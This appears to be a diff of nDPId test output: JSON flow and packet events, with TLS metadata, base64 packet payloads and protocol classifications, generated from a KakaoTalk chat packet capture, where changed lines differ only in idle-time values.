{"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., 
CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"thread_ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="} 
+00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1430069044940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069044940,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLTe0AAQAZ+QwoYUryLlgB9t2MBu1EoA+JiI9GcUBiIgH9kAAAmAAAApDlIVrVdqRc+Gkt7POZ3i2OlX+Y4MArPTZYlBp4hfXC7UiHVW\/8="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1430069048642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069048642,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkakAAjgapGtJn8A8KGFK8AbulXNdU3uvmK0ykUBSkj1vNAAA="} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069049770,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUZ0AAQAZSqgoYUrytwki8h34UbGWkOWcyCtXvgBgB12cmAAABAQgKAAKaQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069060011,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkUAAQAbmZgoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069072945,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTTnkAAQAbVigoYUrw2\/\/3H5i8UZ+uf0YYGiXPCgBQCY5HBAAABAQgKAAKjTTTnT0k="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069072986,"flow_last_seen":1430069072986,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069072986,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="} 
+00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="} +01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
